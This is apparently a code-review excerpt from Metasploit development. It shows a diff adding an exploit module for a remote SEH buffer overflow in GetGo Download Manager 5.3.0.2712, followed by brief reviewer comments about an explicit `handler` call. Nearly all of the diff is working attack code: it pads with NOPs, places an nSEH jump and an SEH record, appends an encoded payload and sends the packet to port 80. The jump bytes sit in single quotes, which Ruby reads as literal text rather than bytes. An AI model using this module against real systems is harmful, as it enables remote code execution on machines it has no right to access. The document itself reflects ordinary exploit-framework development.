modules/exploits/windows/misc/getgo_bof.rb

```diff
@@ -0,0 +1,63 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'GetGo Download Manager bof',
+      'Description'    => %q{
+               GetGo Download Manager 5.3.0.2712 - Remote Buffer Overflow.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'bzyo'
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread'
+        },
+      'Platform'       => 'win',
+      'Payload'        =>
+        {
+          'BadChars'   => "\x00",
+          'Space'      => 800
+        },
+      'Targets'        =>
+        [
+          [ 'GetGo Download Manager v5.3.0.2712',
+            {
+              'Offset' => 20,
+              'Ret'    => 0x72d11f39
+            }
+          ]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Feb 27 2018',
+      'DefaultTarget'  => 0))
+
+    register_options([Opt::RPORT(80)])
+
+  end
+
+  def exploit
+    seh = generate_seh_record(target.ret)
+    nseh = '\xeb\x06\x90\x90'
+    packet = make_nops(target['Offset'])
+    packet << nseh
+    packet << seh
+    packet << payload.encoded
+    packet << make_nops(4055 - payload.encoded.length)
+    connect
+
+    sock.put(packet)
+    handler
```

Comment:
This should be automatic. Don't think you need it unless you're specifying a different socket.

Reply:
Line 60?

Reply:
No, the line I referenced. It's line 61 where you used `handler` explicitly.

Reply:
Okay, I'll remove it